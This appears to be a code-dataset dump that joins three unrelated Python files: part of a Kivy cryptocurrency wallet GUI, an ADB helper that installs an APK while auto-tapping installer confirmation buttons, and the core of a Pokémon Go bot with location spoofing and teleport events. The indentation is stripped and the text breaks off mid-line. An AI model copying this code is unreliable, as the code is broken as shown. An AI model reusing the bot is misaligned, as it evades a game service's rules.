def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
installApp.py | # -*- coding: utf-8 -*-
__author__ = 'joko'
"""
@author:joko
@time: 16/11/11 上午10:52
"""
import lib.adbUtils
import xml.etree.cElementTree as ET
import re
import lib.Utils as U
import threading
from multiprocessing import Queue
import os
class Ia:
def __init__(self, all_result_path, device):
"""
Queue模块是用于进程间通信的模块
:param all_result_path: 本次测试创建的文件夹
:param device: 设备id
"""
self.all_result_path = all_result_path
self.device = device
self.adb = lib.adbUtils.ADB(self.device)
self.queue = Queue(10)
@U.l()
def __uidump(self):
"""
获取当前Activity控件树
:return:xml在电脑内的地址存储地址
"""
save_path = self.all_result_path + "/dump.xml"
self.adb.get_focused_package_xml(save_path)
return save_path
@U.l()
def __element(self):
"""
同属性单个元素,返回单个坐标元组
button_list:常见的确认,同意,按钮控件id
"""
button0 = 'com.android.packageinstaller:id/ok_button'
button1 = 'com.android.packageinstaller:id/btn_allow_once'
button2 = 'com.android.packageinstaller:id/bottom_button_two'
button3 = 'com.android.packageinstaller:id/btn_continue_install'
button4 = 'android:id/button1'
button5 = 'vivo:id/vivo_adb_install_ok_button'
button_list = [button0, button1, button2, button3, button4, button5]
self.__uidump()
self.pattern = re.compile(r"\d+")
if not os.path.exists(self.all_result_path + "/dump.xml"):
U.Logging.warn('Failed to get xml')
return None
tree = ET.ElementTree(file=self.all_result_path + "/dump.xml")
tree_iter = tree.iter(tag="node")
for elem in tree_iter:
if elem.attrib["resource-id"] in button_list:
bounds = elem.attrib["bounds"]
coord = self.pattern.findall(bounds)
x_point = (int(coord[2]) - int(coord[0])) / 2.0 + int(coord[0])
y_point = (int(coord[3]) - int(coord[1])) / 2.0 + int(coord[1])
return x_point, y_point
else:
return None
def tap(self):
"""
点击动作
:return:
"""
coordinate_points = self.__element()
if coordinate_points is not None:
self.adb.touch_by_element(coordinate_points)
def tap_all(self):
"""
不间断获取xml,并且点击。配合多线程使用
:return:
"""
while True:
self.tap()
if not self.queue.empty():
break
@U.l()
def __install_app(self, package_name, app_file_path):
"""
:param package_name: 应用的报名:com:x.x
:param app_file_path: 应用的安装路径,注意需要绝对路径
:return:
"""
self.adb.quit_app(
'com.android.packageinstaller') # kill安装程序,用于处理oppo的一个bug
if self.queue.empty():
if self.adb.is_install(package_name):
U.Logging.success(
'del {}-{}'.format(self.device, package_name))
self.adb.remove_app(package_name)
install_num = 0
while install_num < 4:
install_info = self.adb.install_app(app_file_path).stdout.readlines()
U.Logging.success('install_info:%s'%install_info)
if self.adb.is_install(package_name):
self.queue.put(1)
break
else:
U.Logging.error('Reinstalling %s %s '%(package_name,self.device))
install_num += 1
else:
raise AssertionError('Reinstalling app error')
# kill安装程序,用于处理oppo的一个bug
self.adb.quit_app('com.android.packageinstaller')
def main(self):
"""
开启多线程:
线程1:安装应用
线程2:获取当前页面是否有可点击的按钮
:return:
"""
ini = U.ConfigIni()
install_file = ini.get_ini('test_install_path', 'path')
package_name = ini.get_ini('test_package_name', 'package_name')
threads = []
click_button = threading.Thread(target=self.tap_all, args=())
threads.append(click_button)
install_app = threading.Thread(
target=self.__install_app, args=(
package_name, install_file))
threads.append(install_app)
process_list = range(len(threads))
for i in process_list:
threads[i].start()
for i in process_list:
threads[i].join()
self.adb.shell('"rm -r /data/local/tmp/*.xml"')
if __name__ == '__main__':
a = Ia('/Users/joko/Desktop/temp', 'VGAMCQEI99999999')
a.main()
|
__init__.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
import cell_workers
from base_task import BaseTask
from plugin_loader import PluginLoader
from api_wrapper import ApiWrapper
from cell_workers.utils import distance
from event_manager import EventManager
from human_behaviour import sleep
from item_list import Item
from metrics import Metrics
from pokemongo_bot.event_handlers import LoggingHandler, SocketIoHandler, ColoredLoggingHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from worker_result import WorkerResult
from tree_config_builder import ConfigException, MismatchTaskApiVersion, TreeConfigBuilder
from inventory import init_inventory
from sys import platform as _platform
import struct
class PokemonGoBot(object):
@property
def position(self):
return self.api._position_lat, self.api._position_lng, 0
@position.setter
def position(self, position_tuple):
self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
def __init__(self, config):
self.config = config
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
self.tick_count = 0
self.softban = False
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
# Make our own copy of the workers for this instance
self.workers = []
# Theading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
def start(self):
self._setup_event_system()
self._setup_logging()
self._setup_api()
random.seed()
def _setup_event_system(self):
handlers = []
if self.config.logging_color:
handlers.append(ColoredLoggingHandler())
else:
handlers.append(LoggingHandler())
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
self.event_manager = EventManager(*handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
# Emitting event should be enough to add logging and send websocket
# message: :
# self.event_manager.emit('location', 'level'='info', data={'lat': 1, 'lng':1}),
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=('time',)
)
self.event_manager.register_event(
'bot_sleep',
parameters=('time_in_seconds',)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'distance',
'current_position'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'distance',
'lure_distance',
'current_position'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event(
'arrived_at_fort',
parameters=(
'current_position'
)
)
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'cp', 'iv', 'iv_display', 'exp',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'iv', 'cp')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('quantity', 'type'))
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('distance_in_km',)
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'pokemon',
'cp', 'iv', 'exp', 'stardust', 'candy'
)
)
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'below_iv', 'below_cp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'cp', 'iv')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=(
'old_name', 'current_name'
)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event('unset_pokemon_nickname')
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position[0:2])
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = 0
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def _setup_logging(self):
# log settings
# log format
if self.config.debug:
log_level = logging.DEBUG
logging.getLogger("requests").setLevel(logging.DEBUG)
logging.getLogger("websocket").setLevel(logging.DEBUG)
logging.getLogger("socketio").setLevel(logging.DEBUG)
logging.getLogger("engineio").setLevel(logging.DEBUG)
logging.getLogger("socketIO-client").setLevel(logging.DEBUG)
logging.getLogger("pgoapi").setLevel(logging.DEBUG)
logging.getLogger("rpc_api").setLevel(logging.DEBUG)
else:
log_level = logging.ERROR
logging.getLogger("requests").setLevel(logging.ERROR)
logging.getLogger("websocket").setLevel(logging.ERROR)
logging.getLogger("socketio").setLevel(logging.ERROR)
logging.getLogger("engineio").setLevel(logging.ERROR)
logging.getLogger("socketIO-client").setLevel(logging.ERROR)
logging.getLogger("pgoapi").setLevel(logging.ERROR)
logging.getLogger("rpc_api").setLevel(logging.ERROR)
logging.basicConfig(
level=log_level,
format='%(asctime)s [%(name)10s] [%(levelname)s] %(message)s'
)
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
# prevent crash if return not numeric value
if not self.is_numeric(self.api._auth_provider._ticket_expire):
self.logger.info("Ticket expired value is not numeric", 'yellow')
return
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
position = self.position
self.api = ApiWrapper()
self.position = position
self.login()
self.api.activate_signature(self.get_encryption_lib())
@staticmethod
def is_numeric(s):
try:
float(s)
return True
except ValueError:
return False
def login(self):
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, 0)
while not self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password)):
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login error, server busy. Waiting 10 seconds to try again."
)
time.sleep(10)
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
def get_encryption_lib(self):
if _platform == "linux" or _platform == "linux2" or _platform == "darwin":
file_name = 'encrypt.so'
elif _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
if sys.maxsize > 2**32:
file_name = 'encrypt_64.dll'
else:
file_name = 'encrypt.dll'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
self.logger.error(file_name + ' is not found! Please place it in the bots root directory or set libencrypt_location in config.')
self.logger.info('Platform: '+ _platform + ' Encrypt.so directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' Encrypt.so directory: ' + path)
return full_path
def _setup_api(self):
# instantiate pgoapi
self.api = ApiWrapper()
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self._print_character_info()
self.api.activate_signature(self.get_encryption_lib())
self.logger.info('')
self.update_inventory()
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
response_dict = self.api.get_player()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
self._print_character_info()
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
stardust = '0'
items_stock = self.current_inventory()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.get_player_info()
self.logger.info(
'Pokemon Bag: {}/{}'.format(
self.get_inventory_count('pokemon'),
player['max_pokemon_storage']
)
)
self.logger.info(
'Items: {}/{}'.format(
self.get_inventory_count('item'),
player['max_item_storage']
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_stock[1]) +
' | GreatBalls: ' + str(items_stock[2]) +
' | UltraBalls: ' + str(items_stock[3]))
self.logger.info(
'RazzBerries: ' + str(items_stock[701]) +
' | BlukBerries: ' + str(items_stock[702]) +
' | NanabBerries: ' + str(items_stock[703]))
self.logger.info(
'LuckyEgg: ' + str(items_stock[301]) +
' | Incubator: ' + str(items_stock[902]) +
' | TroyDisk: ' + str(items_stock[501]))
self.logger.info(
'Potion: ' + str(items_stock[101]) +
' | SuperPotion: ' + str(items_stock[102]) +
' | HyperPotion: ' + str(items_stock[103]) +
' | MaxPotion: ' + str(items_stock[104]))
self.logger.info(
'Incense: ' + str(items_stock[401]) +
' | IncenseSpicy: ' + str(items_stock[402]) +
' | IncenseCool: ' + str(items_stock[403]))
self.logger.info(
'Revive: ' + str(items_stock[201]) +
' | MaxRevive: ' + str(items_stock[202]))
self.logger.info('')
def use_lucky_egg(self):
return self.api.use_item_xp_boost(item_id=301)
def get_inventory(self):
if self.latest_inventory is None:
self.latest_inventory = self.api.get_inventory()
return self.latest_inventory
def update_inventory(self):
# TODO: transition to using this inventory class everywhere
init_inventory(self)
response = self.get_inventory()
self.inventory = list()
inventory_items = response.get('responses', {}).get('GET_INVENTORY', {}).get(
'inventory_delta', {}).get('inventory_items', {})
if inventory_items:
for item in inventory_items:
item_info = item.get('inventory_item_data', {}).get('item', {})
if {"item_id", "count"}.issubset(set(item_info.keys())):
self.inventory.append(item['inventory_item_data']['item'])
def current_inventory(self):
inventory_req = self.get_inventory()
inventory_dict = inventory_req['responses']['GET_INVENTORY'][
'inventory_delta']['inventory_items']
user_web_inventory = os.path.join(_base_dir, 'web', 'inventory-%s.json' % self.config.username)
with open(user_web_inventory, 'w') as outfile:
json.dump(inventory_dict, outfile)
# get player items stock
# ----------------------
items_stock = {x.value: 0 for x in list(Item)}
for item in inventory_dict:
item_dict = item.get('inventory_item_data', {}).get('item', {})
item_count = item_dict.get('count')
item_id = item_dict.get('item_id')
if item_count and item_id:
if item_id in items_stock:
items_stock[item_id] = item_count
return items_stock
def item_inventory_count(self, id):
inventory_req = self.get_inventory()
inventory_dict = inventory_req['responses'][
'GET_INVENTORY']['inventory_delta']['inventory_items']
if id == 'all':
return self._all_items_inventory_count(inventory_dict)
else:
return self._item_inventory_count_per_id(id, inventory_dict)
def _item_inventory_count_per_id(self, id, inventory_dict):
item_count = 0
for item in inventory_dict:
item_dict = item.get('inventory_item_data', {}).get('item', {})
item_id = item_dict.get('item_id', False)
item_count = item_dict.get('count', False)
if item_id == int(id) and item_count:
return item_count
return 0
def _all_items_inventory_count(self, inventory_dict):
item_count_dict = {}
for item in inventory_dict:
item_dict = item.get('inventory_item_data', {}).get('item', {})
item_id = item_dict.get('item_id', False)
item_count = item_dict.get('count', False)
if item_id and item_count:
item_count_dict[item_id] = item_count
return item_count_dict
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
with open(os.path.join(_base_dir, 'data', 'last-location-%s.json' %
self.config.username)) as f:
location_json = json.load(f)
location = (
location_json['lat'],
location_json['lng'],
0.0
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
